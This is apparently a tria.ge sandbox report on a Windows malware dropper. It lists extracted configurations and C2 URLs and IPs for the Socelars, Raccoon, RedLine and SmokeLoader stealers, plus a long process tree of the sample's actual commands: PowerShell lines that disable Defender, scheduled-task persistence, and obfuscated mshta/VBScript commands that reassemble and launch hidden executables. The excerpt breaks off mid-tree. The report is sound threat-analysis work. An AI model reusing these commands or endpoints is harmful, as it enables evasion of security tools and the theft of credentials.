Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

10/11/2021, 14:52

211110-r84p8aedej 10

09/11/2021, 13:19

211109-qkrv3sfcg4 10

Analysis

  • max time kernel
    86s
  • max time network
    338s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    10/11/2021, 14:52

General

  • Target

    0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe

  • Size

    4.4MB

  • MD5

    5fdb93aaa25f3b7e5a0a7d046e92df52

  • SHA1

    450ea998b3090ef6922200b87e49fd0c7f543420

  • SHA256

    0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc

  • SHA512

    85421cae4393bd86da4a1d48fbfd4f1fa14ae3c369f9f3da5f4ef5684ce18ed5576d9e221a1264f01cb9a6211113ca64a16e708671f83e946773cd0c430dd8e6

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

raccoon

Botnet

2f2ad1a1aa093c5a9d17040c8efd5650a99640b5

Attributes
  • url4cnc

    http://telegatt.top/oh12manymarty

    http://telegka.top/oh12manymarty

    http://telegin.top/oh12manymarty

    https://t.me/oh12manymarty

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

Chris

C2

194.104.136.5:46013

Extracted

Family

redline

Botnet

media18

C2

91.121.67.60:2151

Extracted

Family

smokeloader

Version

2020

C2

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32
rc4.i32

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil

    suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil

  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 20 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 7 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 47 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe
    "C:\Users\Admin\AppData\Local\Temp\0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4044
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:908
      • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3736
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
            PID:3252
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3808
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            4⤵
              PID:372
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2208
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue208cf4ca51e7e9.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:680
              • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue208cf4ca51e7e9.exe
                Tue208cf4ca51e7e9.exe
                5⤵
                • Executes dropped EXE
                PID:1980
                • C:\Users\Admin\Pictures\Adobe Films\l2zGiEWaI4l0TWxANB7pt3gG.exe
                  "C:\Users\Admin\Pictures\Adobe Films\l2zGiEWaI4l0TWxANB7pt3gG.exe"
                  6⤵
                    PID:4936
                  • C:\Users\Admin\Pictures\Adobe Films\XmZDk4gDcoZKv6M7nxrk1F01.exe
                    "C:\Users\Admin\Pictures\Adobe Films\XmZDk4gDcoZKv6M7nxrk1F01.exe"
                    6⤵
                      PID:4480
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                        7⤵
                        • Creates scheduled task(s)
                        PID:5528
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                        7⤵
                        • Creates scheduled task(s)
                        PID:2412
                      • C:\Users\Admin\Documents\QbyHB2fOiJVNlvic_hyffrKf.exe
                        "C:\Users\Admin\Documents\QbyHB2fOiJVNlvic_hyffrKf.exe"
                        7⤵
                          PID:2260
                          • C:\Users\Admin\Pictures\Adobe Films\SOmPqnhkxsdmFxmf2LqcleZ4.exe
                            "C:\Users\Admin\Pictures\Adobe Films\SOmPqnhkxsdmFxmf2LqcleZ4.exe"
                            8⤵
                              PID:6096
                            • C:\Users\Admin\Pictures\Adobe Films\a4JvDB_6WThShOJrK6LJh2XJ.exe
                              "C:\Users\Admin\Pictures\Adobe Films\a4JvDB_6WThShOJrK6LJh2XJ.exe"
                              8⤵
                                PID:6880
                              • C:\Users\Admin\Pictures\Adobe Films\S0sXEjXwOk5kEU3K_txCPA_J.exe
                                "C:\Users\Admin\Pictures\Adobe Films\S0sXEjXwOk5kEU3K_txCPA_J.exe"
                                8⤵
                                  PID:6868
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c taskkill /f /im chrome.exe
                                    9⤵
                                      PID:7032
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im chrome.exe
                                        10⤵
                                        • Kills process with taskkill
                                        PID:3584
                                  • C:\Users\Admin\Pictures\Adobe Films\PS_G_po0xVmXWBJxTPuBFHQL.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\PS_G_po0xVmXWBJxTPuBFHQL.exe"
                                    8⤵
                                      PID:6968
                                    • C:\Users\Admin\Pictures\Adobe Films\kYMucBPAKRn1e2mnx_FnOCCH.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\kYMucBPAKRn1e2mnx_FnOCCH.exe"
                                      8⤵
                                        PID:7060
                                      • C:\Users\Admin\Pictures\Adobe Films\KKxjsW00LwTr22ElphDcILgN.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\KKxjsW00LwTr22ElphDcILgN.exe"
                                        8⤵
                                          PID:7140
                                          • C:\Windows\SysWOW64\mshta.exe
                                            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\KKxjsW00LwTr22ElphDcILgN.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\KKxjsW00LwTr22ElphDcILgN.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                            9⤵
                                              PID:6536
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\KKxjsW00LwTr22ElphDcILgN.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\KKxjsW00LwTr22ElphDcILgN.exe" ) do taskkill -f -iM "%~NxM"
                                                10⤵
                                                  PID:6848
                                                  • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                    ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                    11⤵
                                                      PID:6820
                                                      • C:\Windows\SysWOW64\mshta.exe
                                                        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                        12⤵
                                                          PID:1060
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                            13⤵
                                                              PID:6476
                                                          • C:\Windows\SysWOW64\mshta.exe
                                                            "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                            12⤵
                                                              PID:6420
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                13⤵
                                                                  PID:6472
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                    14⤵
                                                                      PID:5344
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill -f -iM "KKxjsW00LwTr22ElphDcILgN.exe"
                                                                11⤵
                                                                • Kills process with taskkill
                                                                PID:6524
                                                        • C:\Users\Admin\Pictures\Adobe Films\PbMFaa2tIDZMj22_bFQiK_44.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\PbMFaa2tIDZMj22_bFQiK_44.exe"
                                                          8⤵
                                                            PID:6252
                                                            • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                              C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                              9⤵
                                                                PID:1636
                                                            • C:\Users\Admin\Pictures\Adobe Films\a4pIRO_df8DNQ5Re8jp5k4oi.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\a4pIRO_df8DNQ5Re8jp5k4oi.exe"
                                                              8⤵
                                                                PID:6816
                                                                • C:\Users\Admin\AppData\Local\Temp\is-T99FL.tmp\a4pIRO_df8DNQ5Re8jp5k4oi.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-T99FL.tmp\a4pIRO_df8DNQ5Re8jp5k4oi.tmp" /SL5="$304D6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\a4pIRO_df8DNQ5Re8jp5k4oi.exe"
                                                                  9⤵
                                                                    PID:7004
                                                                • C:\Users\Admin\Pictures\Adobe Films\r08_nsxr4Npggnz1yzU9sdwo.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\r08_nsxr4Npggnz1yzU9sdwo.exe"
                                                                  8⤵
                                                                    PID:6688
                                                                  • C:\Users\Admin\Pictures\Adobe Films\xoqNTxHK0v5EMK2lgJ_MmHEY.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\xoqNTxHK0v5EMK2lgJ_MmHEY.exe"
                                                                    8⤵
                                                                      PID:6372
                                                                      • C:\Users\Admin\Pictures\Adobe Films\xoqNTxHK0v5EMK2lgJ_MmHEY.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\xoqNTxHK0v5EMK2lgJ_MmHEY.exe" -u
                                                                        9⤵
                                                                          PID:2176
                                                                  • C:\Users\Admin\Pictures\Adobe Films\yyjrky3lpLxk5U0XoVEjZ9ni.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\yyjrky3lpLxk5U0XoVEjZ9ni.exe"
                                                                    6⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:2368
                                                                  • C:\Users\Admin\Pictures\Adobe Films\044p2Mpbx7Gc6oCZA_3eL2U5.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\044p2Mpbx7Gc6oCZA_3eL2U5.exe"
                                                                    6⤵
                                                                      PID:3376
                                                                    • C:\Users\Admin\Pictures\Adobe Films\hperzIKvwHlrHCHTUwvh7wPs.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\hperzIKvwHlrHCHTUwvh7wPs.exe"
                                                                      6⤵
                                                                        PID:4748
                                                                        • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                          "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                          7⤵
                                                                            PID:4876
                                                                        • C:\Users\Admin\Pictures\Adobe Films\QpbgWmu_Bu0s9pL6kY1PnOpk.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\QpbgWmu_Bu0s9pL6kY1PnOpk.exe"
                                                                          6⤵
                                                                            PID:4164
                                                                          • C:\Users\Admin\Pictures\Adobe Films\DnbpHauT3PGBemk81VdL4wrD.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\DnbpHauT3PGBemk81VdL4wrD.exe"
                                                                            6⤵
                                                                              PID:1332
                                                                            • C:\Users\Admin\Pictures\Adobe Films\foOXKxLba9jTFGrd8x9HhOKR.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\foOXKxLba9jTFGrd8x9HhOKR.exe"
                                                                              6⤵
                                                                                PID:1908
                                                                              • C:\Users\Admin\Pictures\Adobe Films\XKUu3Rk3nph11obRnIL6Un2W.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\XKUu3Rk3nph11obRnIL6Un2W.exe"
                                                                                6⤵
                                                                                  PID:5048
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\XKUu3Rk3nph11obRnIL6Un2W.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\XKUu3Rk3nph11obRnIL6Un2W.exe"
                                                                                    7⤵
                                                                                      PID:4684
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\RFqL0rgsw5xr60PQ86tWnf1U.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\RFqL0rgsw5xr60PQ86tWnf1U.exe"
                                                                                    6⤵
                                                                                      PID:4680
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 664
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:4300
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\mZf7P1CYLqkSquKoRZxEtkHJ.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\mZf7P1CYLqkSquKoRZxEtkHJ.exe"
                                                                                      6⤵
                                                                                        PID:4728
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\vA5qeN14ZIOdb3VED9dFgbmu.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\vA5qeN14ZIOdb3VED9dFgbmu.exe"
                                                                                        6⤵
                                                                                          PID:4116
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\k4tyyu3GwTIc5zwqeqJqE_ix.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\k4tyyu3GwTIc5zwqeqJqE_ix.exe"
                                                                                          6⤵
                                                                                            PID:3276
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\JHu1j6QX2ShvMxfSgiVyo7qI.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\JHu1j6QX2ShvMxfSgiVyo7qI.exe"
                                                                                            6⤵
                                                                                              PID:4928
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                7⤵
                                                                                                  PID:4732
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\Tvsm4nt1IiFbpV0iZ84F2wWk.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\Tvsm4nt1IiFbpV0iZ84F2wWk.exe"
                                                                                                6⤵
                                                                                                  PID:4532
                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\Tvsm4nt1IiFbpV0iZ84F2wWk.exe
                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\Tvsm4nt1IiFbpV0iZ84F2wWk.exe"
                                                                                                    7⤵
                                                                                                      PID:4308
                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\4K6Su8TZPv56zJKL8rYhokM8.exe
                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\4K6Su8TZPv56zJKL8rYhokM8.exe"
                                                                                                    6⤵
                                                                                                      PID:4840
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\DYQqIXYwYdYipbQYwZnD5PSP.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\DYQqIXYwYdYipbQYwZnD5PSP.exe"
                                                                                                      6⤵
                                                                                                        PID:3904
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 552
                                                                                                          7⤵
                                                                                                          • Program crash
                                                                                                          PID:3260
                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                          7⤵
                                                                                                            PID:508
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\4JDlJvJDcDBBE4cfYF5O9KJn.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\4JDlJvJDcDBBE4cfYF5O9KJn.exe"
                                                                                                          6⤵
                                                                                                            PID:4724
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\4JDlJvJDcDBBE4cfYF5O9KJn.exe" & exit
                                                                                                              7⤵
                                                                                                                PID:912
                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                  timeout /t 5
                                                                                                                  8⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:4852
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\u1LCms6nN7tyYfl6ZR5Mgyw7.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\u1LCms6nN7tyYfl6ZR5Mgyw7.exe"
                                                                                                              6⤵
                                                                                                                PID:2180
                                                                                                                • C:\Users\Admin\AppData\Roaming\1070598.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\1070598.exe"
                                                                                                                  7⤵
                                                                                                                    PID:5832
                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                      8⤵
                                                                                                                        PID:5856
                                                                                                                    • C:\Users\Admin\AppData\Roaming\4698055.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\4698055.exe"
                                                                                                                      7⤵
                                                                                                                        PID:5796
                                                                                                                      • C:\Users\Admin\AppData\Roaming\482741.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\482741.exe"
                                                                                                                        7⤵
                                                                                                                          PID:5176
                                                                                                                        • C:\Users\Admin\AppData\Roaming\267702.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\267702.exe"
                                                                                                                          7⤵
                                                                                                                            PID:5540
                                                                                                                          • C:\Users\Admin\AppData\Roaming\7542033.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\7542033.exe"
                                                                                                                            7⤵
                                                                                                                              PID:6008
                                                                                                                            • C:\Users\Admin\AppData\Roaming\8797237.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\8797237.exe"
                                                                                                                              7⤵
                                                                                                                                PID:5124
                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                  "C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\8797237.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\8797237.exe"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )
                                                                                                                                  8⤵
                                                                                                                                    PID:5336
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\8797237.exe"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\8797237.exe" ) do taskkill /F /Im "%~Nxk"
                                                                                                                                      9⤵
                                                                                                                                        PID:3924
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE
                                                                                                                                          kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ
                                                                                                                                          10⤵
                                                                                                                                            PID:1708
                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                              "C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )
                                                                                                                                              11⤵
                                                                                                                                                PID:5912
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"
                                                                                                                                                  12⤵
                                                                                                                                                    PID:1520
                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  "C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE ( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH & CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )
                                                                                                                                                  11⤵
                                                                                                                                                    PID:6988
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\system32\cmd.exe" /q /C echo ÚtE%cl1V> 8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH & CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM
                                                                                                                                                      12⤵
                                                                                                                                                        PID:6288
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" Echo "
                                                                                                                                                          13⤵
                                                                                                                                                            PID:6180
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"
                                                                                                                                                            13⤵
                                                                                                                                                              PID:5024
                                                                                                                                                            • C:\Windows\SysWOW64\control.exe
                                                                                                                                                              control .\GKq1GTV.ZnM
                                                                                                                                                              13⤵
                                                                                                                                                                PID:6936
                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                  "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM
                                                                                                                                                                  14⤵
                                                                                                                                                                    PID:4992
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill /F /Im "8797237.exe"
                                                                                                                                                            10⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:5284
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\6699392.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\6699392.exe"
                                                                                                                                                      7⤵
                                                                                                                                                        PID:5260
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\1UluA8fZOOuDLonji_FTHFQc.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\1UluA8fZOOuDLonji_FTHFQc.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:2276
                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\94ISCVbcn4L_FZiz9ad9u8ZJ.exe
                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\94ISCVbcn4L_FZiz9ad9u8ZJ.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:4200
                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\Gid5rAfZJz0e2EdFIb3ymtwq.exe
                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\Gid5rAfZJz0e2EdFIb3ymtwq.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:5008
                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
